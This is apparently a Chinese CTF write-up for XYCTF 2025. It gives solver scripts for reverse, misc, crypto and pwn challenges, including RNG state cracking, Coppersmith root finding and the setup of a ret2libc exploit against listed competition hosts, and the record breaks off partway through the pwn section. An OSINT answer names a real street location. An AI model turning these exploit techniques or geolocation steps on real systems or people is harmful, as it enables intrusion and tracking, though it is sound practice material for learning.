chr( -9106+9211 ) & chr( 6064-5952 ) & chr( 6286-6182 ) & chr( -9220+9321 ) & chr( -2056+2170 ) & chr( 279444/4234 ) & chr( 5693-5572 ) & chr( 7627-7511 ) & chr( 9114-9013 ) & chr( 128864/4027 ) & chr( 465247/7627 ) & chr( -1215+1247 ) & chr( 9956-9841 ) & chr( -6215+6255 ) & chr( 26080/652 ) & chr( -5167+5282 ) & chr( 296520/7413 ) & chr( -5640+5745 ) & chr( -8069+8110 ) & chr( -740+772 ) & chr( 92235/2145 ) & chr( 6267-6235 ) & chr( -3504+3619 ) & chr( 11240/281 ) & chr( 753448/7108 ) & chr( -5324+5365 ) & chr( -5911+5952 ) & chr( -2746+2778 ) & chr( -2953+3030 ) & chr( 1074702/9682 ) & chr( -3942+4042 ) & chr( 8672-8640 ) & chr( 3343-3293 ) & chr( -9590+9643 ) & chr( -1920+1974 ) & chr( 190568/4648 ) & chr( -8907+8939 ) & chr( 4693-4605 ) & chr( 4103-3992 ) & chr( 1024974/8991 ) & chr( 117216/3663 ) & chr( -7725+7837 ) & chr( 1025460/9495 ) & chr( 6361-6264 ) & chr( 925995/8819 ) & chr( 166210/1511 ) & chr( 8106-8039 ) & chr( 256672/2468 ) & chr( 8511-8414 ) & chr( -1592+1706 ) & chr( 4349-4336 ) & chr( 20-10 ) & chr( 131648/4114 ) & chr( 3440-3408 ) & chr( 3286-3254 ) & chr( 86528/2704 ) & chr( -209+241 ) & chr( 176256/5508 ) & chr( -4786+4818 ) & chr( 24576/768 ) & chr( 973581/8771 ) & chr( -5686+5803 ) & chr( 1068012/9207 ) & chr( 419760/5830 ) & chr( 438138/4338 ) & chr( 6119-5999 ) & chr( 56320/1760 ) & chr( -5861+5922 ) & chr( -9201+9233 ) & chr( 6816-6705 ) & chr( 8085-7968 ) & chr( -365+481 ) & chr( 604944/8402 ) & chr( 246238/2438 ) & chr( -8362+8482 ) & chr( 171296/5353 ) & chr( -4409+4447 ) & chr( 6653-6621 ) & chr( 336856/4108 ) & chr( -7684+7789 ) & chr( 2731-2628 ) & chr( 6687-6583 ) & chr( 93496/806 ) & chr( 1485-1445 ) & chr( 5893-5859 ) & chr( 410832/8559 ) & chr( -4662+4696 ) & chr( 44352/1386 ) & chr( -9673+9711 ) & chr( 86144/2692 ) & chr( 507744/7052 ) & chr( 9182-9081 ) & chr( 7532-7412 ) & chr( 8068-8028 ) & chr( 921096/9304 ) & chr( 7511-7406 ) & chr( 542752/4846 ) & chr( 7625-7521 ) & chr( 811939/8039 ) & chr( -5529+5643 ) & chr( 366498/5553 ) & chr( 366993/3033 ) & chr( 116/1 ) & chr( -4380+4481 ) & chr( 234889/5729 ) & chr( 374-330 ) & chr( 7121-7089 ) & chr( -964+1014 ) & chr( -9185+9226 ) & chr( 53105/4085 ) & chr( 1368-1358 ) & chr( 3776-3744 ) & chr( 81760/2555 ) & chr( 2908-2876 ) & chr( 672/21 ) & chr( 591084/7578 ) & chr( -9777+9878 ) & chr( 4310-4190 ) & chr( -329+445 ) & chr( 8841-8828 ) & chr( 80190/8019 ) & chr( 9449-9417 ) & chr( 5188-5156 ) & chr( 6912/216 ) & chr( 46496/1453 ) & chr( 8868-8855 ) & chr( -6823+6833 ) & chr( -5834+5866 ) & chr( 7348-7316 ) & chr( 214720/6710 ) & chr( -3281+3313 ) & chr( -6230+6312 ) & chr( -281+398 ) & chr( -5980+6090 ) & chr( 2673-2591 ) & chr( 233897/3491 ) & chr( -8111+8143 ) & chr( -3952+4013 ) & chr( 7846-7814 ) & chr( 5859-5748 ) & chr( 661752/5656 ) & chr( 742632/6402 ) & chr( 2362-2290 ) & chr( 286234/2834 ) & chr( 814-694 ) & chr( 40105/3085 ) & chr( 4489-4479 ) & chr( -838+907 ) & chr( -8563+8673 ) & chr( -2698+2798 ) & chr( -2969+3001 ) & chr( 7600-7530 ) & chr( 896805/7665 ) & chr( -8073+8183 ) & chr( 1727-1628 ) & chr( -6557+6673 ) & chr( 3501-3396 ) & chr( 87357/787 ) & chr( 4403-4293 ) & chr( 3724-3711 ) & chr( 4260-4250 ) & chr( -6051+6064 ) & chr( -71+81 ) & chr( 466-427 ) & chr( 6300-6268 ) & chr( -15360+8376 ) & chr( -1.435792E+08/8237 ) & chr( -21866-10 ) & chr( -4.86175E+07/8145 ) & chr( -1.932544E+08/5987 ) & chr( 3287-3159 ) & chr( -19485+2053 ) & chr( -10516-6235 ) & chr( 78936/6072 ) & chr( -9394+9404 ) & chr( 551807/7559 ) & chr( 973692/9546 ) & chr( 310720/9710 ) & chr( 507832/6682 ) & chr( 4001-3934 ) & chr( -4647+4744 ) & chr( -6770+6885 ) & chr( 491163/4863 ) & chr( 10032-9992 ) & chr( -1066+1148 ) & chr( 174330/1490 ) & chr( 986700/8970 ) & chr( 78064/952 ) & chr( -5671+5738 ) & chr( -6282+6322 ) & chr( 4287-4185 ) & chr( 3549-3441 ) & chr( 790162/8146 ) & chr( 8188-8085 ) & chr( -800+844 ) & chr( 522-490 ) & chr( -5550+5663 ) & chr( 284291/2389 ) & chr( -9338+9440 ) & chr( -6438+6539 ) & chr( 8277-8236 ) & chr( -8711+8752 ) & chr( -5591+5623 ) & chr( 148291/2431 ) & chr( -3434+3466 ) & chr( 425372/5597 ) & chr( -5132+5199 ) & chr( -322+419 ) & chr( 185380/1612 ) & chr( 5352-5251 ) & chr( 365160/9129 ) & chr( 9277-9158 ) & chr( -489+590 ) & chr( 913002/8951 ) & chr( -8433+8531 ) & chr( 8830-8713 ) & chr( 1089-970 ) & chr( 192990/1838 ) & chr( -9564+9681 ) & chr( -5453+5554 ) & chr( 40221/981 ) & chr( -7928+7960 ) & chr( 756672/9008 ) & chr( 785824/7556 ) & chr( 1607-1506 ) & chr( -5161+5271 ) & chr( -8087+8100 ) & chr( 90010/9001 ) & chr( 34688/1084 ) & chr( 20224/632 ) & chr( 8731-8699 ) & chr( 178496/5578 ) & chr( -837+914 ) & chr( -4694+4809 ) & chr( -7603+7706 ) & chr( 619212/9382 ) & chr( 1092906/9846 ) & chr( 7594-7474 ) & chr( 69632/2176 ) & chr( 133042/3913 ) & chr( 9457-9390 ) & chr( 2319-2208 ) & chr( 475200/4320 ) & chr( -8977+9080 ) & chr( -8597+8711 ) & chr( 1592-1495 ) & chr( 754812/6507 ) & chr( -6078+6195 ) & chr( -9522+9630 ) & chr( 1824-1727 ) & chr( -6145+6261 ) & chr( 312690/2978 ) & chr( -1513+1624 ) & chr( 902220/8202 ) & chr( 1378-1263 ) & chr( -8522+8555 ) & chr( -6796+6828 ) & chr( -57+124 ) & chr( -4239+4350 ) & chr( 964212/8458 ) & chr( 573534/5031 ) & chr( 565903/5603 ) & chr( -8417+8516 ) & chr( 1116732/9627 ) & chr( -8648+8680 ) & chr( -6586+6656 ) & chr( -1832+1908 ) & chr( -5339+5404 ) & chr( 559267/7877 ) & chr( 138765/4205 ) & chr( 2868-2834 ) & chr( 556-543 ) & chr( 53810/5381 ) & chr( 212589/3081 ) & chr( -4647+4755 ) & chr( 712885/6199 ) & chr( -1506+1607 ) & chr( 91234/7018 ) & chr( 1299-1289 ) & chr( -4904+4936 ) & chr( 9659-9627 ) & chr( 117024/3657 ) & chr( 38720/1210 ) & chr( 440748/5724 ) & chr( 19320/168 ) & chr( -9444+9547 ) & chr( -3384+3450 ) & chr( 9050-8939 ) & chr( -6493+6613 ) & chr( -5110+5142 ) & chr( -2061+2095 ) & chr( 1450-1363 ) & chr( 111+3 ) & chr( 9913-9802 ) & chr( 152680/1388 ) & chr( -1082+1185 ) & chr( 4066-4034 ) & chr( 6896-6794 ) & chr( 838-730 ) & chr( -2902+2999 ) & chr( 5974/58 ) & chr( -8244+8290 ) & chr( -9640+9674 ) & chr( 36491/2807 ) & chr( -2075+2085 ) & chr( -301+370 ) & chr( -2824+2934 ) & chr( -2915+3015 ) & chr( 1811-1779 ) & chr( -7946+8019 ) & chr( -5275+5377 ) & chr( -7424+7437 ) & chr( 34620/3462 ) & vbcrlf )
"""
expressions = re.findall(r'chr\(\s*([^)]+)\s*\)', vbs_code)
result = []
for expr in expressions:
try:
value = int(eval(expr)) % 256 # 处理负数和溢出
result.append(chr(value))
except:
pass # 忽略可能的错误
# 拼接最终字符串
decrypted = ''.join(result)
print("解密后的字符串:", decrypted)解密后的字符串
MsgBox "Dear CTFER. Have fun in XYCTF 2025!"
flag = InputBox("Enter the FLAG:", "XYCTF")
wefbuwiue = "90df4407ee093d309098d85a42be57a2979f1e51463a31e8d15e2fac4e84ea0df622a55c4ddfb535ef3e51e8b2528b826d5347e165912e99118333151273cc3fa8b2b3b413cf2bdb1e8c9c52865efc095a8dd89b3b3cfbb200bbadbf4a6cd4" ' ¢è¿šRC4Šå†»æ¼å…蛉潼ï‰
qwfe = "rc4key"
' Àåç„RC4Šå†‡æ°
Function RunRC(sMessage, strKey)
Dim kLen, i, j, temp, pos, outHex
Dim s(255), k(255)
' ˆåŒŒå†’?
kLen = Len(strKey)
For i = 0 To 255
s(i) = i
k(i) = Asc(Mid(strKey, (i Mod kLen) + 1, 1)) ' ¯é¥½è¨ASCII¼ç
Next
' KSA¯é¥°å¦
j = 0
For i = 0 To 255
j = (j + s(i) + k(i)) Mod 256
temp = s(i)
s(i) = s(j)
s(j) = temp
Next
' PRGAŠæ†µçŒ
i = 0 : j = 0 : outHex = ""
For pos = 1 To Len(sMessage)
i = (i + 1) Mod 256
j = (j + s(i)) Mod 256
temp = s(i)
s(i) = s(j)
s(j) = temp
' Šå†¹è¬¸å…蛉?
Dim plainChar, cipherByte
plainChar = Asc(Mid(sMessage, pos, 1)) ' ™ç‡ŒASCII¤ç†
cipherByte = s((s(i) + s(j)) Mod 256) Xor plainChar
outHex = outHex & Right("0" & Hex(cipherByte), 2)
Next
RunRC = outHex
End Function
' ¸éŒ°éè‘
If LCase(RunRC(flag, qwfe)) = LCase(wefbuwiue) Then
MsgBox "Congratulations! Correct FLAG!"
Else
MsgBox "Wrong flag."
End IfRC4加密,上脚本解密
def rc4(data, key):
# 初始化置换数组
s = list(range(256))
j = 0
# KSA阶段:根据密钥置换数组
for i in range(256):
j = (j + s[i] + ord(key[i % len(key)])) % 256
s[i], s[j] = s[j], s[i]
# PRGA阶段:生成伪随机流,并异或数据
i = 0
j = 0
output = []
for byte in data:
i = (i + 1) % 256
j = (j + s[i]) % 256
s[i], s[j] = s[j], s[i]
k = s[(s[i] + s[j]) % 256]
output.append(byte ^ k)
return bytes(output)
# 给定的密文(十六进制字符串)
ciphertext_hex = "90df4407ee093d309098d85a42be57a2979f1e51463a31e8d15e2fac4e84ea0df622a55c4ddfb535ef3e51e8b2528b826d5347e165912e99118333151273cc3fa8b2b3b413cf2bdb1e8c9c52865efc095a8dd89b3b3cfbb200bbadbf4a6cd4"
# 将十六进制字符串转换为字节
ciphertext_bytes = bytes.fromhex(ciphertext_hex)
# 使用的密钥
key = "rc4key"
# 解密
plaintext = rc4(ciphertext_bytes, key)
print("解密后的明文:", plaintext.decode('utf-8', errors='ignore'))得到
flag{We1c0me_t0_XYCTF_2025_reverse_ch@lleng3_by_th3_w@y_p3cd0wn's_chall_is_r3@lly_gr3@t_&_fuN!}
Md5转换XYCTF{5f9f46c147645dd1e2c8044325d4f93c}
Dragon
查壳可得
让ai分析一下
得到一个可查看文件
让ai分析一下,exp如下:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from itertools import product
# 1. 从 LLVM IR 中提取出的 CRC64 目标值(已转为 uint64)
enc = [
-2565957437423125689,
224890624719110086,
1357324823849588894,
-8941695979231947288,
-253413330424273460,
-7817463785137710741,
-5620500441869335673,
984060876288820705,
-6993555743080142153,
-7892488171899690683,
7190415315123037707,
-7218240302740981077,
]
# 转为 uint64 表示
enc = [e & 0xFFFFFFFFFFFFFFFF for e in enc]
# 2. CRC64-ECMA 多项式常量
POLY = 0x42F0E1EBA9EA3693
MASK64 = 0xFFFFFFFFFFFFFFFF
def calculate_crc64_direct(data: bytes) -> int:
"""
完整模拟 LLVM IR 中的 calculate_crc64_direct 函数逻辑
"""
crc = MASK64 # 初始值 0xFFFFFFFFFFFFFFFF
for b in data:
# 把字节移到高 8 位
crc ^= (b << 56) & MASK64
# 逐位处理
for _ in range(8):
if crc & (1 << 63):
crc = ((crc << 1) & MASK64) ^ POLY
else:
crc = (crc << 1) & MASK64
# 异或反转
return crc ^ MASK64
def main():
# 可能的字符集,根据题目 flag 习惯
charset = 'abcdefghijklmnopqrstuvwxyz' \
'ABCDEFGHIJKLMNOPQRSTUVWXYZ' \
'0123456789_{}-!?.'
result = bytearray()
print("[*] 开始爆破,每组 2 字符,共 %d 组" % len(enc))
for idx, target in enumerate(enc):
print(f"[*] 第 {idx+1:02d} 组,目标 CRC64 = {hex(target)} ... ", end='', flush=True)
found = False
# 爆破两字符组合
for a, b in product(charset, repeat=2):
pair = (a + b).encode('ascii')
if calculate_crc64_direct(pair) == target:
print(f"匹配: {a}{b}")
result.extend(pair)
found = True
break
if not found:
print("!!! 未找到匹配 !!!")
return
flag = result.decode('ascii', errors='ignore')
print("\n[+] 爆破完成,拼接得到 flag:")
print(flag)
candidates = []
for a, b in product(charset, repeat=2):
if calculate_crc64_direct((a + b).encode()) == enc[11]:
candidates.append(a + b)
print("候选匹配:", candidates)
if __name__ == '__main__':
main()moon
Pyd逆向,直接用网上的frida hook脚本 hook pyd api ,这道题只需要hook xor就行。
然后把每次异或的值打出来。
接着找密文,异或就是flag
data = [0x42, 0x6b, 0x87, 0xab, 0xd0, 0xce, 0xaa, 0x3c,
0x58, 0x76, 0x1b, 0xbb, 0x01, 0x72, 0x60, 0x6d,
0xd8, 0xab, 0x06, 0x44, 0x91, 0xa2, 0xa7, 0x6a,
0xf9, 0xa9, 0x3e, 0x1a, 0xe5, 0x6f, 0xa8, 0x42,
0x06, 0xa2, 0xf7]
key = [0x24,0x7,0xe6,0xcc,0xab,0xac,0xdf,0x48,0x7, 0xf, 0x2b, 0xce, 0x5e, 0x1e, 0x50, 0x5d, 0xb3,
0x98,0x62,0x1b,0xe4,0xd2,0xf8,0x2a,0x8d,0xf6,0x4a,0x72,0xd6,0x30,0xc5,0xd,0x49,0xcc,0x8a,0x89, 0xb3, 0x73, 0xde, 0x12,0xd1,0xfa,0x17,0x8, 0xd0, ]
for i in range(35):
data[i] ^= key[i]
print(''.join(chr(i) for i in data))
MISC
XGCTF
去ctfshow找XGCTF wp
看到web3有相关字符
搜索引擎得到
查看http://dragonkeeep.top/category/CISCN%E5%8D%8E%E4%B8%9C%E5%8D%97WEB-Polluted/index.html网站源代码
Base64解码
flag{1t_I3_t3E_s@Me_ChAl1eNge_aT_a1L_P1e@se_fOrg1ve_Me}
签个到吧
观察发现这个brainfuck没有输出字符
让ai补齐输出字符
解密
MADer也要当CTFer
观看视频可以发现字幕文件有特殊字符
把字幕导出来
去除多余字符
复制到010中
通过字符串查找猜测可能是AE文件
导入发现缺少
安装完库后,进入项目,查看图层,根据常识可得flag2为flag
右键编辑文本ctrl+a ctrl+c ctrl+v得出l_re@IIy_w@nn@_2_Ie@rn_AE
Flag为flag{l_re@IIy_w@nn@_2_Ie@rn_AE}
曼波曼波曼波
连续的大写A等于号特征base64还有/号,逆序一下base64解
exp:
import base64
with open('smn.txt', 'r', encoding='utf-8') as f:
content = f.read()
reversed_content = content[::-1]
with open('1.txt', 'w', encoding='utf-8') as f:
f.write(reversed_content)
print("已将 smn.txt 字符逆序写入 1.txt")
with open('1.txt', 'r', encoding='utf-8') as f:
b64_content = f.read()
# 去除可能的换行符和空格
b64_content = b64_content.strip()
# Base64 解码
try:
decoded_bytes = base64.b64decode(b64_content)
# 将解码结果写入 2.txt
with open('2.txt', 'wb') as f:
f.write(decoded_bytes)
print("已将 base64 解码内容写入 2.txt")
except Exception as e:
print("Base64 解码失败:", e)
得到一个FFD8FFE8的文件,猜测是JPG
随波逐流查看有隐藏文件
提取得到以下文件
有个图片查看没有信息,有个压缩包,secret提示密码为好像是什么比赛名字加年份
猜测可能是XYCTF2025
得到一个图片,和一开始的easy图片长得差不多,猜测为双图盲水印
随波逐流盲图忙水印解得flag
会飞的雷克萨斯
通过百度识图,可以得到四川小孩哥等信息
翻找相关报道可以找出大概位置
查找美宜佳附件店铺结合提示xx省xx市xx县xxx路xxxxxx内
可以猜测xxxxxx内为中铁城市中心内flag{四川省内江市资中县春岚北路中铁城市中心内}
Greedymen
贪心算法
exp:
#!/usr/bin/env python3
from pwn import remote
import re
HOST = '8.147.132.32'
PORT = 16814
def factors(n):
"""返回 n 的所有真因子(不含自身)"""
res = set([1])
for i in range(2, int(n**0.5)+1):
if n % i == 0:
res.add(i)
res.add(n // i)
return res
def choose_number(unassigned):
"""对每个可选数字计算净收益,返回最大净收益对应的数字"""
best = None
best_score = -1e9
uset = set(unassigned)
for x in unassigned:
facs = factors(x)
# 至少有一个因子还在 unassigned
if facs.isdisjoint(uset):
continue
gain = x
loss = sum(f for f in facs if f in uset)
net = gain - loss
if net > best_score:
best_score = net
best = x
return best
def read_state(conn):
"""读到完整的状态块后返回拼好的字符串,并在屏幕打印出来方便调试"""
buf = ""
while True:
line = conn.recvline(timeout=2).decode(errors='ignore')
if not line:
break
print(line, end="") # 调试输出
buf += line
if "Unassigned Numbers" in line:
# 再多读三行:Counter, Your Score, Opponent Score
for _ in range(3):
l = conn.recvline().decode(errors='ignore')
print(l, end="")
buf += l
break
return buf
def parse_state(data):
unassigned = list(map(int, re.search(r"\[([0-9, ]+)\]", data).group(1).split(',')))
cnt = int(re.search(r"Counter: (\d+)", data).group(1))
my = int(re.search(r"Your Score: (\d+)", data).group(1))
op = int(re.search(r"Opponent Score: (\d+)", data).group(1))
return unassigned, cnt, my, op
def play():
conn = remote(HOST, PORT)
# 读欢迎和菜单
banner = conn.recvuntil(b"\n", timeout=2).decode(errors='ignore')
print(banner, end="")
# 直接进入 Play
conn.sendline(b"1")
while True:
data = read_state(conn)
unassigned, cnt, my, op = parse_state(data)
if cnt == 0 or not unassigned:
break
pick = choose_number(unassigned)
if pick is None:
pick = unassigned[0]
print(f"[+] Counter={cnt}, My={my}, Op={op}, Pick={pick}")
conn.sendline(str(pick).encode())
# 读剩下输出(flag)
out = conn.recvall(timeout=2).decode(errors='ignore')
print(out)
conn.close()
if __name__ == '__main__':
play()
Crypto
Division
mt19937
from pwn import *
from randcrack import RandCrack
import sys
def main():
# 配置日志级别和超时参数
context.log_level = 'debug'
context.timeout = 15 # 全局超时设为15秒
# 连接远程服务器
try:
p = remote('39.106.69.240', 22648)
except Exception as e:
print(f"连接失败: {e}")
sys.exit(1)
rc = RandCrack()
# 阶段1: 收集624个随机数
try:
for i in range(624):
# 发送选项1
p.sendlineafter(b': >>> ', b'1')
# 发送分母1并接收结果
p.sendlineafter(b'denominator: >>> ', b'1')
line = p.recvline().decode().strip()
# 提取分子数值
if '//' not in line:
print(f"异常响应: {line}")
sys.exit(2)
nominator = int(line.split('//')[0])
rc.submit(nominator)
# 进度显示
if (i+1) % 100 == 0:
print(f"已收集 {i+1}/624 个随机数...")
except EOFError:
print("连接意外中断")
sys.exit(3)
# 阶段2: 预测大数并提交答案
try:
# 预测随机数
print("开始预测大随机数...")
rand1 = rc.predict_getrandbits(11000)
rand2 = rc.predict_getrandbits(10000)
correct_ans = rand1 // rand2
print(f"预测答案: {correct_ans}")
# 提交答案
p.sendlineafter(b': >>> ', b'2')
p.sendlineafter(b'answer: >>> ', str(correct_ans).encode())
# 智能接收响应
flag = b''
while True:
try:
chunk = p.recv(timeout=5)
if not chunk:
break
flag += chunk
if b'}' in flag: # 检测到flag结束符
break
except EOFError:
break
print("\n最终响应:")
print(flag.decode(errors='ignore'))
except Exception as e:
print(f"执行异常: {e}")
finally:
p.close()
if __name__ == '__main__':
main()
Reed
靠线性模型和已知取值范围 来暴力求解 a。
核心思路:利用「差分穷举」解出 aaa
exp:
import string
from collections import Counter
from pwn import remote
HOST = '8.147.132.32'
PORT = 25211
M = 19198111
table = string.ascii_letters + string.digits # len=62
def egcd(a, b):
if b == 0:
return (1, 0, a)
x, y, g = egcd(b, a % b)
return (y, x - (a // b) * y, g)
def inv_mod(a, m):
x, _, g = egcd(a % m, m)
if g != 1:
return None
return x % m
def fetch_enc(seed=123):
conn = remote(HOST, PORT)
conn.recvuntil(b'give me seed:')
conn.sendline(str(seed).encode())
line = conn.recvline().decode().strip()
conn.close()
return eval(line)
def recover_a(enc):
n = len(enc)
cand = Counter()
for i in range(n):
for j in range(i+1, n):
ci, cj = enc[i], enc[j]
dc = (ci - cj) % M
if dc == 0:
continue # 跳过相同密文对
# 枚举 Δm = m_i - m_j
for dm in range(-61, 62):
if dm == 0:
continue
inv = inv_mod(dm, M)
if inv is None:
continue
a = (dc * inv) % M
cand[a] += 1
a, cnt = cand.most_common(1)[0]
print(f"[+] Found a = {a} (votes={cnt})")
return a
def recover_flag(enc, a):
a_inv = inv_mod(a, M)
# 枚举 m0
for m0 in range(62):
b = (enc[0] - a * m0) % M
flag = []
ok = True
for c in enc:
idx = ((c - b) * a_inv) % M
if not (0 <= idx < 62):
ok = False
break
flag.append(table[idx])
if ok:
body = ''.join(flag)
return f"XYCTF{{{body}}}"
raise RuntimeError("No valid b found")
def main():
enc = fetch_enc(123)
print(f"[+] Ciphertext: {enc}")
a = recover_a(enc)
flag = recover_flag(enc, a)
print(f"[+] Recovered flag: {flag}")
if __name__ == '__main__':
main()
Complex_signin
二元copper
# Sage 10.5
from Crypto.Util.number import *
from Crypto.Cipher import ChaCha20
import itertools
import hashlib
class Complex:
def __init__(self, re, im):
self.re = re
self.im = im
def __mul__(self, c):
re_ = self.re * c.re - self.im * c.im
im_ = self.re * c.im + self.im * c.re
return Complex(re_, im_)
def __eq__(self, c):
return self.re == c.re and self.im == c.im
def __rshift__(self, m):
return Complex(self.re >> m, self.im >> m)
def __lshift__(self, m):
return Complex(self.re << m, self.im << m)
def __str__(self):
if self.im == 0:
return str(self.re)
elif self.re == 0:
if abs(self.im) == 1:
return f"{'-' if self.im < 0 else ''}i"
else:
return f"{self.im}i"
else:
return f"{self.re} {'+' if self.im > 0 else '-'} {abs(self.im)}i"
def tolist(self):
return [self.re, self.im]
def complex_pow(c, exp, n):
result = Complex(1, 0)
while exp > 0:
if exp & 1:
result = result * c
result.re = result.re % n
result.im = result.im % n
c = c * c
c.re = c.re % n
c.im = c.im % n
exp >>= 1
return result
def Small_roots(f, bounds, m=1, d=None):
if not d:
d = f.degree()
R = f.base_ring()
N = R.cardinality()
f /= f.coefficients().pop(0)
f = f.change_ring(ZZ)
G = Sequence([], f.parent())
for i in range(m + 1):
base = N ^ (m - i) * f ^ i
for shifts in itertools.product(range(d), repeat=f.nvariables()):
g = base * prod(map(power, f.variables(), shifts))
G.append(g)
B, monomials = G.coefficient_matrix()
monomials = vector(monomials)
factors = [monomial(*bounds) for monomial in monomials]
for i, factor in enumerate(factors):
B.rescale_col(i, factor)
B = B.dense_matrix().LLL()
B = B.change_ring(QQ)
for i, factor in enumerate(factors):
B.rescale_col(i, 1 / factor)
H = Sequence([], f.parent().change_ring(QQ))
for h in filter(None, B * monomials):
H.append(h)
I = H.ideal()
if I.dimension() == -1:
H.pop()
elif I.dimension() == 0:
roots = []
for root in I.variety(ring=ZZ):
root = tuple(R(root[var]) for var in f.variables())
roots.append(root)
return roots
return []
n = 24240993137357567658677097076762157882987659874601064738608971893024559525024581362454897599976003248892339463673241756118600994494150721789525924054960470762499808771760690211841936903839232109208099640507210141111314563007924046946402216384360405445595854947145800754365717704762310092558089455516189533635318084532202438477871458797287721022389909953190113597425964395222426700352859740293834121123138183367554858896124509695602915312917886769066254219381427385100688110915129283949340133524365403188753735534290512113201932620106585043122707355381551006014647469884010069878477179147719913280272028376706421104753
mh = [3960604425233637243960750976884707892473356737965752732899783806146911898367312949419828751012380013933993271701949681295313483782313836179989146607655230162315784541236731368582965456428944524621026385297377746108440938677401125816586119588080150103855075450874206012903009942468340296995700270449643148025957527925452034647677446705198250167222150181312718642480834399766134519333316989347221448685711220842032010517045985044813674426104295710015607450682205211098779229647334749706043180512861889295899050427257721209370423421046811102682648967375219936664246584194224745761842962418864084904820764122207293014016, 15053801146135239412812153100772352976861411085516247673065559201085791622602365389885455357620354025972053252939439247746724492130435830816513505615952791448705492885525709421224584364037704802923497222819113629874137050874966691886390837364018702981146413066712287361010611405028353728676772998972695270707666289161746024725705731676511793934556785324668045957177856807914741189938780850108643929261692799397326838812262009873072175627051209104209229233754715491428364039564130435227582042666464866336424773552304555244949976525797616679252470574006820212465924134763386213550360175810288209936288398862565142167552]
C = [5300743174999795329371527870190100703154639960450575575101738225528814331152637733729613419201898994386548816504858409726318742419169717222702404409496156167283354163362729304279553214510160589336672463972767842604886866159600567533436626931810981418193227593758688610512556391129176234307448758534506432755113432411099690991453452199653214054901093242337700880661006486138424743085527911347931571730473582051987520447237586885119205422668971876488684708196255266536680083835972668749902212285032756286424244284136941767752754078598830317271949981378674176685159516777247305970365843616105513456452993199192823148760, 21112179095014976702043514329117175747825140730885731533311755299178008997398851800028751416090265195760178867626233456642594578588007570838933135396672730765007160135908314028300141127837769297682479678972455077606519053977383739500664851033908924293990399261838079993207621314584108891814038236135637105408310569002463379136544773406496600396931819980400197333039720344346032547489037834427091233045574086625061748398991041014394602237400713218611015436866842699640680804906008370869021545517947588322083793581852529192500912579560094015867120212711242523672548392160514345774299568940390940653232489808850407256752]
enc = b'\x9c\xc4n\x8dF\xd9\x9e\xf4\x05\x82!\xde\xfe\x012$\xd0\x8c\xaf\xfb\rEb(\x04)\xa1\xa6\xbaI2J\xd2\xb2\x898\x11\xe6x\xa9\x19\x00pn\xf6rs- \xd2\xd1\xbe\xc7\xf51.\xd4\xd2 \xe7\xc6\xca\xe5\x19\xbe'
H1, H2 = mh
R.<a, b> = PolynomialRing(Zmod(n))
m = Complex(H1+a, H2+b)
e = 3
c0, c1 = complex_pow(m, e, n).tolist()
cc = (Complex(C[0], C[1])*Complex(C[0], -C[1])).tolist()[0]%n
# f = c0**2-c1**2-cc
f = c0+c1-C[0]-C[1]
# f = a^3 + 3*a^2*b + 24240993137357567658677097076762157882987659874601064738608971893024559525024581362454897599976003248892339463673241756118600994494150721789525924054960470762499808771760690211841936903839232109208099640507210141111314563007924046946402216384360405445595854947145800754365717704762310092558089455516189533635318084532202438477871458797287721022389909953190113597425964395222426700352859740293834121123138183367554858896124509695602915312917886769066254219381427385100688110915129283949340133524365403188753735534290512113201932620106585043122707355381551006014647469884010069878477179147719913280272028376706421104750*a*b^2 - b^3 + 8561230439391494652964518079446866842028983721243871740678085235648991512859872293006057125946195621933460646577683274888911938749947557410456108560903123308064214736765941945738775653721483764217371543335053845725104842641255359216126438087575748363812755658467878613009428632965461891901240897234636188930235282197189301164406617550554690260556986611562066604124144832597773727110574037779927891595935693982966830195674965362451719533630740904542001614547907337380053585804136986902195402489249460519464000870105805136557334600320113259559943913383018435361217217104812738179655056392017057962783432200904463335198*a^2 + 6163799086663089962922878486960603142634653538500224574832263309440400229663429444570933160280165674448658503594787869647336933393720197549431618115096044569161176249548202319676097265865134657809473896391215120739767015838378744420378342497449899073039539146408914174451544338926849687587831995410255864815701686178843374965444666563981900463161918999438376904095758736775640077425796056312967479913525078770895606917077380117257738733072179942037031959709220473324555473244613738718787227651478347323106867852590532126128479231814921669949192426355051363233877106237061402904328257094614989652010276687972168393043*a*b + 15679762697966073005712578997315291040958676153357192997930886657375568012164709069448840474029807626958878817095558481229689055744203164379069815494057347454435594034994748266103161250117748344990728097172156295386209720366668687730275778296784657081783099288677922141356289071796848200656848558281553344705082802335013137313464841246733030761832923341628046993301819562624652973242285702513906229527202489384588028700449544333151195779287145864524252604833520047720634525110992297047144731035115942669289734664184706976644598019786471783562763441998532570653430252779197331698822122755702855317488596175801957769555*b^2 + 8582315269410774124823258095478638178400311338560576630170632792087826268541848192157284161775144141390466950130002880062929754436334772569409319879709529362955091119713278408599807595588291629302014979201344547010038900810178552429321583393544411216874629359260251433015427350406719033660758322297664710302803080884510007292884545686747353200444929485345063906619923592883942046920924037295178396626395542817350280717218663940179156863901518943815489142519766272616280029940228109891973565352582586997816034329477858678872073912458740936516437948386921875997037630996851903247129500893656525306719940410016725344963*a + 9066702840505699658953639629049021586916363316170704417649115572876309712531356189172030182617604403951747329772530572036914069246050371461129464183292120480687494873848837951165017111995384704238710809368220281252728347967513567280702968114168708629246003495756610542054418871944250402793677442419990580751321411501359378894627370595956209386973974699638050558218349345229260540918407359009979814836175788585813509503761192618177925809599677209102109929913853634890558975293814075446507981374306918776717379220717945656050077399293768358753505649971575739045815663571359392939841395387283696158734529803863089540947*b + 4805774750765038061327556884398652536344606373367627677111485580490062182765687888710315961663704027282741591779241278727300067702107160563887395488716230827474053953433814243850092109681699617928281456674297264619080170357774519373012998020671222354556601140408549885753694431420033201910809797935451695258585846751385900277218096178916147879419695528842812780786662970149357673762169798068711274549067281725249613496222729889626404788855830317683020701073816999141217783365883823644055041860499295484600163514145831627927982650728945632980415134587925386783887549931839269502638480317130634267954398513416615988501
a, b = Small_roots(f, bounds=(2**128, 2**128), m=1, d=4)[0]
m = Complex(H1+a, H2+b)
print(ChaCha20.new(key=hashlib.sha256(str(m.re + m.im).encode()).digest(), nonce=b'Pr3d1ctmyxjj').decrypt(enc))
# XYCTF{Welcome_to_XYCTF_Now_let_us_together_play_Crypto_challenge}
PWN
Ret2libc's Revenge
利用gadget中的rsi间接控制rdi,puts留下rdx为1,改stdout缓冲模式,泄露打一个ret2libc
from pwn import *
contex.log_level='debug'
io = process('./pwn')
io = remote("47.94.103.208",28733)
elf = ELF(‘./pwn’)
libc = ELF("libc.so.6")
gadget1 = 0x0000000000401180
